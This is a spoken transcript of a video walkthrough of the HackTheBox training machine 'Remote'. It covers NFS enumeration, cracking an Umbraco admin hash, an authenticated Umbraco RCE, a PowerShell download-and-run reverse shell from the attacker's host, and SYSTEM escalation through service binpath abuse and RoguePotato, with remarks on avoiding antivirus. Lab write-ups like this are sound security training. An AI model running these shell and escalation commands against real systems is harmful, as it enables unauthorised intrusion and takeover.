What's going on YouTube? This is Ipsec. I'm doing remote from HackTheBox, which was an easy Windows box, so we'll be doing this one live. However, these intros are recorded after I've recorded the rest of the video, so I know once we start off, we're going to see a bunch of ports open. It's got like FTP, NFS, SMB, a web service, so we're going to do a bunch of light enumeration and eventually find a way to a NFS service that has a website backup. That website backup will have a username and password hash that will crack and get authenticated to the website, which is called Umbraco. It's a content management system, and there's a authenticated RCE out for that application, so we'll use that to get a shell on the box, and then on the box we'll privesc two different ways. The very first way we're going to do is through modifying a service that we have full permission of, and then the second way is going to be through Rogue Potato, which is the new version of Juicy Potato. So with all that being said, let's just jump in. As always, we're going to start with the nmap, so -sc for default scripts, SV, enumerate versions, OA, output all formats, put in the nmap directory and call it remote, and then the IP address, which is 10.10.10.180. This can take some time to run, so I'm going to add the -v flag so it shows me open ports as it finds them. And I'm also going to run nmap with sudo. And it doesn't look like it wants to run because the nmap directory is not created, so let's add that and restart it. Right off the bat, we have a few ports open. We have 135, 111, and 139, which are kind of like maybe RPC ports. It's kind of hard to enumerate these ports individually. 80 is HTTP, 21 is FTP, 445 is SMB, and 2049 is NFS. So I'm guessing this is going to be a Windows box just based upon 445 and these ports being open. Mainly 445, 139, and 135. But I'm going to check out FTP first because that's the easiest check to look at manually. So FTP 10.10.10.180. Log in with anonymous, password anonymous, and we get in. I'm going to do a dir-a and no files are there. So I'm going to do a touch test and then I'm going to try to upload that file. It's probably put. And we get access denied. So we can't upload files through FTP, and there's no files on this FTP server, which is a bit weird. Don't know exactly the purpose of this right now. The reason why I wanted to upload a file is because this also has a web server. So if I can upload a shell via FTP, I could probably execute it over that web server. Or I'm assuming it's a web server because port 80 is listening. The next thing I want to look at is probably SMB shares. So I'm going to do crackmap-exec. And I'm checking which version, because I have two versions of crackmap-exec installed. I think, let's see, crackmap-exec and CME, those are the same exact thing. Always something worth checking because I've made that mistake once when I was installing it manually. So CME and crackmap-exec may be different programs, just something to check on your installation. SMB 10.10.10.180, and then I think it's --shares. I wonder if we can do SMB-H to show modules. And then search for share, spider share, --shares. So that's what we want to do. So crackmap-exec, SMB 10.10.10.180, --shares. And this is also going to tell us the OS. So this is Windows 10. This build isn't too reliable to determine like patch level because it doesn't get updated that much. It is a 64-bit box, so that's handy to know. And the name and domain is both remote, so this most likely is not a domain controller. We also know it's not a domain controller because like DNS isn't listening. Signing's false and SMBv1's false. But we have the host name, which is remote. So I'm going to do sudo vi etc host. And we can do 10.10.10.180 remote. So we have that there. The shares didn't really get anything, so I'm going to try a different tool just because it's always handy to have multiple tools check things that you want to look at. So SMB client -L to list shares 10.10.10.180, and we get access denied. I'm also going to do a -U, I think it's capital U with a period, and we're just trying to do some type of null authentication to see if that works. Doesn't look like it works. We can try guest and account disabled. So probably nothing we can really do over 445. So exit this. Our nmap is finished. So let's just less nmap remote.nmap and see what we have. 21, we knew FTP was allowed. 80 is the website. We have RPC bind and NFS. So we could do showmount. Let's see. RPC and nothing really left. So there's really two things we can do. We can look at NFS or we can look at HTTP. I'm going to start looking at HTTP first just because I can put a bunch of automated tasks looking at the web server while I then look at NFS. So let's go take a look at 10.10.10.180. And we get a page, welcome to Acme. And there is no certificate. So let's see. We see posting dates by February 19th, 2020. And these looks like maybe tags. I don't know exactly how that works. We see in the footer it says Umbraco, which is I think CMS, a content management system done in .NET. Looking at products. Looking at people. So we have a bunch of people, which could be handy to later go and build brute forcing list with. I'm going to hit Alt F2, just run a program, run cherry tree, run it, and then Control N to create a new node, remote, Control Shift N to child node, people, and we're just going to paste. Come on. The next one is going to be Jevin Leopold and Jerome Brower. This formatting got screwed all up. Oh well. And there was one other thing I noticed. We have a Twitter, which is just his first and last name, and Circuit Beard for his Instagram. So I'm also going to add Circuit Beard. And we'll just move on because we don't even have a login or anything yet to do this. So going to About Us, it looks like a lorem ipsum, nothing really there. Contact, nothing. Intranet, nothing, but that is interesting. I'm going to look at the source code and we can confirm it is Umbraco. So let's start a GoBuster just to see if we can find any pages. So make dir GoBuster. Let's go in here. GoBuster dermo-u HTTP 10.10.10.180-w for word list user share word list dirbuster directory list 2.3. Is there a lowercase? I'm actually going to use a lowercase word list because Windows web servers are not case sensitive. So if we went to people and do p, like just mess up all the casing, it's still going to work. So we can filter out a lot of the go busting by just killing all case sensitivity. So 2.3 medium like this. I'm also going to do extension txt because a lot of application would do like license.txt or readme.txt that will include a version number. And then after that, there's probably one last thing we should add, and that is O for out file. We'll just do root.gobuster. Permission, what? Oh, I'm in user share word list, whatever. There we go. And if you didn't know, when you do cd space dash, that goes to previous working directory. So with the GoBuster running, let's go and I guess look at a login page, and then we'll look at NFS. So Umbraco login page. Let's see. Does it say? Looks like website /Umbraco. So website, Umbraco. Okay. So username is usually email. So we can try, we don't even know the domain. Try admin password. Login failed for admin. put something that doesn't exist. Login failed for that user. So right there, I was checking if this would tell us if the user exists or not. Send it over to Burp Suite. Look at what this request looks like. It is in JSON. Post login. Doesn't really look like anything. We could try to do a brute force to break our way into this application, but we don't know a valid username. So there's really nothing we can do here. And it looks like even when we do any type of email, it's just going to say an email was sent. So no way to validate valid users on this right now. So I'm going to move over to NFS while the GoBuster runs, and hopefully we'll find something in this NFS share. The first tool I'm going to run is showmount-e to show the export table, 10.10.10.180. And if you don't have the show mount, it's part of the nfs-common package. So you just do apt install nfs-common to install it. There is a site backups directory. I'm also going to run showmount-a 10.10.10.180. And I'm guessing this isn't going to show me anything because it's HackTheBox and there's no clients. But if we look at man show mount, you can see it's going to list the client or IP addresses associated with the mount, which is awesome because knowing the clients that are using the mount may give you other ideas for attack. Like in a Linux environment, NFS is sometimes used as a home directory server. So if you know all the boxes that have that home directory server mounted and the path, you may be able to get usernames, and if you have access to the NFS server, you can get the private key and then know which boxes you can potentially SSH into. So knowing who is mounting the server is definitely handy, so always run the -a flag, and then -e is showing you all the mounts on the box. So we do have site backups. So I'm going to do make dir /mount/ I guess remote sudo. And we'll do sudo mount-t nfs 10.10.10.180 :/site_backups and /mount remote. And what this everyone means, this means everyone can mount it. If you just saw an IP address here, that means only that host has ability to mount it, or a host name or a range or something. So because it's everyone, that's what allows us to mount it. Let's go into mount remote, and we can see it looks like the web server. So let's cat web.config and see what this is. That is a lot of data. grep-i version web.config. And I was hoping to get like an Umbraco version, but I don't feel like reading all of this. And I don't even know if it exists. So we will just ignore that, I guess. Do another ls. I'm going to copy web config, and then we're going to try to touch test. We have permission denied. CP that web config over top of it, permission denied. If we could overwrite this web config, we could probably get a code execution, but we can't. So we'll do find .-ls, and we'll pipe this over to HB remote web.dir. And what that's going to do, if we tail-f web.dir, well, the command's not done yet, but it's going to give us a list of every file. And it's going to be locally on our box, so it's a bit quicker to browse around. So let's go back into mount remote and try taking a look while that runs. Let's see. Umbraco, so anything in here? Client, I'm looking for like a config or something. Config, create grep-i. Let's just go grep-password and config. Grep-i password here. And that gets a lot of hits, but we can remove lang because we don't care about language. And I guess open yet another window. Oh, nope, that one came back. So let's take a look at app data, umbraco.config. Is this one different? Grep-i password. Improved. Don't know exactly what that is. What is umbraco.sdf? I don't know what .sdf is. Let's see. What is SDF file? Umbraco. Looks like a database. Less umbraco SDF. Strings. Got a lot. So let's see. Grep-i password. Grep. So we got a username, admin@htb.local. So let's grep admin, whoops, admin@htb.local. See what we have. And right at the top, looks like we have a SHA-1 hash because we see hash algorithm SHA-1. Let's copy this, echo-n, wc-c, 40 characters, and that is the same as a SHA-1 hash. So we can echo please subscribe, SHA-1 sum, and then echo this, and you'll see they're both the same number of characters. Oh my god. Echo. You can see both the same number of characters. There's probably a flag not to have these extra, but that's why I wasn't doing wc-c, just because it has junk after it. So I guess we can... Is hashes.org back online yet? It is not. Is it hash killer? Since it's just straight SHA-1, I'm just going to use some sites first to check it out. Let's see, come on. Choose file. No. Algorithm type, SHA-1 sum. You can tell how often I use these sites. I'm just going to paste it. Google. And we can get, the password is bacon and cheese. If you wanted to use hashcat, hashcat -help, example hashes, grep-i SHA-1. There's a lot of that. So grep-i -b for before 3. SHA-1 is 100. So if we just do the word list, bacon and cheese, not the password, please sub, v, not word list now, hashes. Let's go back. we pasted it here. And then hashcat-m 100 word list is hashes like this, and -f for force, or is it -- force? And you can see that's how you'd crack a SHA-1 hash. The reason why I used a small dictionary file is because I was using this -- force flag, and you should never give hashcat a lot of work to do when you're not using a GPU. That's why normally I SSH into a box called the Kraken, because that's where I have a graphics card that I can use for cracking. However, that box is currently offline, so that's why I was doing it all on my VM. So with the password, bacon, and cheese, we can now potentially log into Umbraco. So let's do admin at, what was the username? It was like HackTheBox dot something. Admin at htb.local. And the password is bacon and cheese. So let's log in. Admin at htb.local, bacon and cheese. And it's taking its sweet time to log in. Come on. Wonder if we have to refresh. Admin, bacon, and cheese. Yeah, for some reason it wanted us to refresh. Probably because I had disabled burp between the two. So now we're on the web server. I'm going to check searchbloit to see if there's any exploits for Umbraco. Searchbloit, Umbraco. And there is a remote authenticated command execution. So let's take a look at this. Searchbloit-x. Oh. Like that. And it wants, well, its date is January 1st, 7/12/4. So let's go back into the web config, grep-i 7.12, and we can see Umbraco configuration status is this exact version. So we should be good to go. So let's see what this is doing. Login, password, host. So this is XML, C#, string command. I'm guessing we have to put a command here. Start file name is calc. Probably don't want that. Okay, so let's do searchbloit-m to mirror and edit the script. So first thing we have to do is put the login. Admin at htb.local. Password is bacon and cheese. And the host is 10.10.10.180. I don't know the difference between this proc start info file name and string cmd. We'll treat the string cmd as like argv. So just do /c ping 10.10.14.2. And then this will be the program we're executing. So hopefully these two get joined together, and it does cmd.exe/c ping 10.10.14.2. Guessing if I read more of this, I'd get that. So let's save this, and then do sudo tcp dump -i ton0 -v. Oh god. icmp -v. And run this. No schema, perhaps you meant, okay. So I think it wants a HTTP before this. HTTP:// run. and we get some pings. And this is Windows, so we should only get 4. Hopefully it stops, and it does. So we have code execution. So let's make dir dub. It's been a while since we did this Windows reverse shell. Opt. Do I have a shang? Find /opt grep -I. Oh no, it's in user share. CP user share. Shang. Shells. Invoke. What is it? We'll do PowerShell TCP.ps1. We'll just call this rev.ps1. Okay. And we want a reverse shell. So we'll just take this example, put it down the very bottom, and then replace the IP address. So 10.10.14.2, and the port, we'll do 9001. So let's start a web server. So Python 3-m http.server. And then what we want to do is start a web shell. So nclvnp 9001. And then we go back up here. And I'm going to change this to PowerShell. And as I do that, I realize exactly how this is working. So we have proc.start info.filename PowerShell.exe, and then we're giving it the argument cmd, and then we're just executing it. So definitely works exactly how we thought. I'm not going to do the IEX new object method. Instead, I'm going to do IEX IWR, which is Invoke-WebRequest, HTTP 10.10.14.2. We did, what do we call it? Rev.ps1. And we'll do use, I think, basic parsing is how this one works. It's just a slightly different shell that involves less typing. If it doesn't work, then we will switch and use the other one, but right off the bat, I realized I did not put port 8000 in this invoke web request. And it doesn't look like it, oh, nope, it hit. And we got a connection and a shell. So there we go. The other one, I'm sure you know, it's IEX new object Net.WebClient download string HTTP 10.10.14.2 8000/rev.ps1. And that does essentially the same exact thing as the invoke web request, except AVs really stopped liking this new object Net.WebClient, so I have more luck with the invoke web request method. So that's the only reason I used it. So let's do dir. Okay, who am I /all. And what privileges do we have? We do have SC impersonate, but this is a probably newer version of Windows 10, so standard juicy potato won't work. Since this box came out, there's been a new program called Rogue Potato that I haven't actually used, so maybe we'll try that at the very end of the video. However, Rogue Potato came out after this box, so I'm not going to start off with that. Let's do FTP transfer. Is there anything actually in here? There is not. Site backups. This looks like the directory we had access to, that I thought was inetpub, the home directory of the web server, but looks like that's just the NFS. Go into users. Let's see. Administrator. Can't access. So let's try doing a privesc. I'm guessing the user.txt is probably in public desktop. There it is. There's user.txt if you wanted it. But let's run WinPEAS. So I'm going to go to opt, privilege, lowercase. It's been a while since I've ran this, so I'm just going to do a git pull to update. And then let's go to WinPEAS, winpeas.exe, WinPEAS bin x64 release, and we finally got to the exe. So WinPEAS exe, copy it to HTTP remote, and then what was the directory www, and let's just put it in public documents. IWR HTTP 10.10.14 to port 8000 / WinPEAS.exe. I think it's -out file WinPEAS.exe. And let's go back to our directory and run the web server. Did it download? It looks like it did. So let's try executing WinPEAS.exe. And it's taking a long time, which is definitely a good sign. Maybe it's not. /WinPEAS.exe. And if this doesn't work, I'll try /. It's taking a long time, which may or may not be a good sign. I'm guessing it is just working its magic right now. So there is other tools out there. I recently came across this GitHub repo called Sharp Collection, I think, which is amazing. So if you hated compiling .NET tools like I did, just the Sharp Collection thing has a bunch of things. When you compile your own .NET, it's less likely to be picked up by AMSI. But for like HackTheBox learning and just playing with tools, this repo is a goldmine. And it looks like WinPEAS has finished. So let's take a look at what we can do. I'll look at Rogue Potato later. So let's see. OS build. Looks like we got a few things. What is Sharp by Bear? I have no idea what this one is. Sharp by... Let's see. Music, Edge of Cortana. Maybe we'll look at that after this. Let's go through all of this to see if there's anything interesting. And the reason why I'm not harping on that, any type of like OS exploit, that's generally the last thing I do. I like looking for misconfigurations or things like that first, just because they're more reliable. When you screw up with a OS level exploit, chances are you can really hose the box and screw with things. Let's see, process information. Just going down, looking at the red. Looks like we can modify some services. UsoSvc, we have all access. So that one stands out for some reason. I'm just going to go over here and make a note of it. Come on, where is it? UsoSvc. Just so I remember that. Oh no. Lost my place. UsoSvc. Scrolling. We don't have anything, but I'm thinking more. It said all access. So I was thinking we could just start it, but we can modify this service. So we can just change the binary path of this service and execute it, which I'm guessing is what this is going to tell us to do. We can go to the book.hacktricks.xyz and sc say permissions, get a list. Yep. Enable. And modify. So scconfig, service name, binpath. So let's try playing with this. Since we're in a PowerShell shell, sc is actually alias to like set content or something. So anytime you want to do sc, you have to do scexe. I've been bitten by that so many times. UsoSvc. We can see it's running. We can do sc.exe config UsoSvc. Does it give us the config? It does not, but I'm actually going to redo my shell because I want the up arrow. So let's exit out of this. I'm going to do script reverse.log and then rl wrap, I think. Sudo, let's exit the script because I don't have rl wrap installed. Sudo apt install rl wrap. And that stands for read line wrap, which will just give me the ability to do up and down in a Windows shell. So once this finishes, I always hate how long it takes for the processing trigger man page to finish. So script reverse.log, this is going to set up a log file on our box, giving us all the input and output logging. And then I'm going to do rl wrap nclvnp 9001. And we're going to get our reverse shell again. And it'll take a second. And let's go back to users public documents. And we'll do sc.exe config binpath equals, I think that's how it was. Yep. And then we'll do PowerShell.exe. I wonder if we can just do IWR this way. IWR HTTP 10.10.10 or 10.10.14.2 port 8000 /rev.ps1 and then use basic parsing. I wonder if we can do it this way. sc config. We didn't do UsoSvc. Okay. sc.exe stop UsoSvc. And then we'll start it. But before we do, we'll listen on 9001. And it doesn't look like that worked. So I'm going to get rid of the single quotes. We'll try it. Doesn't look like that worked either. So let's do a PowerShell encoder command. So echo, we wanted IEX, and then IWR HTTP 10.10.14.2 port 8000 rev.ps1, then use basic parsing. And I convert to UTF, I think it's -16 little endian, and then base 64 -w0. I think this gives us a PowerShell encoder command. So we'll try this way. So we'll do PowerShell.exe -encoded command, paste, start, and it's still not working. So let's try binpath is equal to cmd.exe/c PowerShell. Start. And it looks like it worked that way. For some reason, it just didn't want PowerShell.exe to be the thing. So maybe PowerShell is not in the path. But now we have NT authority system. And we can go that and go into desktop And we could get root.txt if we wanted to. So that is the box doing it that way. Let's go and play with Rogue Potato and see what this does. Let's go back to Firefox and see if it's in Sharp collection. It does not look like it is. So I'm going to Google Rogue Potato GitHub. Go to the first result. And then it looks like they have a release. So let's just try running this. Save it. And we can do cp downloads, Rogue Potato, unzip it. And let's move both of those to www. And then we'll download both of them here. So IWR HTTP 10.10.14.2 port 8000 rogue potato.exe-o rogue potato.exe. Then we want to do the oxid resolver. I'm not positive if we have to do this, but for the first time running it would probably help. And maybe it's out file, not O. It looks like O works, thank God. So let's see. Full details at this. Let's see, does he just have screenshots of it working? So /c rogue potato -r IP. So we'll do /rogue potato.exe, then -r 10.10.14.2, and then -e is the command. So -e, we'll do cmd.exe/c PowerShell -encoded command, and let's grab this like that, and -l quad 9s. See what happens. I don't have high hopes because I've never ran this tool before, but said I would, so let's try it. Name pipe didn't receive a response. Exiting. So maybe this is due to the CLS ID. And does Rogue Potato have something to check that? Don't believe it does. So may have to do a separate video on this technique once I look at it more. But if you looked at Juicy Potato, they had a CLS ID thing. I wonder if we can just replace it. Juicy Potato CLS ID. Because these numbers probably didn't change. Let's see. Windows 10. And we'll try, well, we know USO's on it. We'll try this. -c, that. Maybe we need did it not like it? -r. We'll do -c. Put it in quotes. I missed one quote. Oh shoot, I don't have, I think that just worked. I don't have netcat running, but I see a get to rev.ps1. Who am I? And tier 30 system. So let's try doing it without that CLS ID. Had it worked? I'm guessing it didn't, because I don't think I remember it hitting rev.ps1. Yeah, it did not. So, by sheer luck, guessing that we should use this CLS ID, we had it. And I'm sure there's plenty of other ones that work. The default is, I think, bit.svc, which is like bit's admin, which is being removed. We could try, let's just try trusted installer like this. See how many we can get real quick. So delete all this. Paste. I have an extra space there. Shoot. Come on. Give me my command back. Let that run. Netman. I'm just going to see if there's another host I recognize. That would probably be a good one. So many of them. Bits. Let's just try UPnP host. And then I'm going to look at the sharp bear thing. And then we'll call it a video. But happy I got the rogue potato working with very little prep. I actually did not expect that to work. I have double brackets. And I think it was in the fighter video that I used Juicy Potato and have a way to enumerate all CLS IDs to give you a list of what ones work or not. But yeah, that's that. I'm going to search for bear, and let's take a look at this repo a bit more to see what this exploit is. Oh, I had it over here. Let's see. Race condition in app SVC. Oh, we won't be able to do this because by targeting, you have to open Edge manually after you do the exploit to trigger the race condition. For Katana, you have to click on the search menu on the lower left. So we can't do either of those because we don't have a desktop. So can't really do that. We could go through all these CVEs, but I'm sure some would work, some wouldn't. I'd recommend you check it out yourself. And hope you guys enjoyed the video. Take care, and I will see you all next week.